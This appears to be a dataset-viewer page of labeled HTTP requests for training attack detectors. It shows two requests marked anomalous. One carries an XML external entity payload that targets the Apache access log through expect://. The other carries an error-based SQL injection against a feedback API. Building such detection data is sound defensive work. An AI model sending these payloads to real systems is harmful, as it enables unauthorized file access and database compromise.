User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=EE5E498805EF60075CE61CA747A7FBBC
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 120
id=%3C%21DOCTYPE%20data%20%5B%3C%21ENTITY%20ent%20expect%3A///%22var/log/apache2/access.log%22%3E%20%5D%3E&submit=Submit | anomalous | XML_External_Entity |
POST /api/Feedbacks/ HTTP/1.1
Content-Length: 333
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Referer: http://localhost:3000/api/Feedbacks/
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip,deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: close
comment=test%27%20AND%20ROW%283435%2C1883%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71706b7871%2C%28SELECT%20%28ELT%283435%3D3435%2C1%29%29%29%2C0x716a767171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%208471%20UNION%20SELECT%209201%20UNION%20SELECT%203430%20UNION%20SELECT%206950%29a%20GROUP%20BY%20x%29--%20FPeL&rating=1 | anomalous | SQL Injection |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.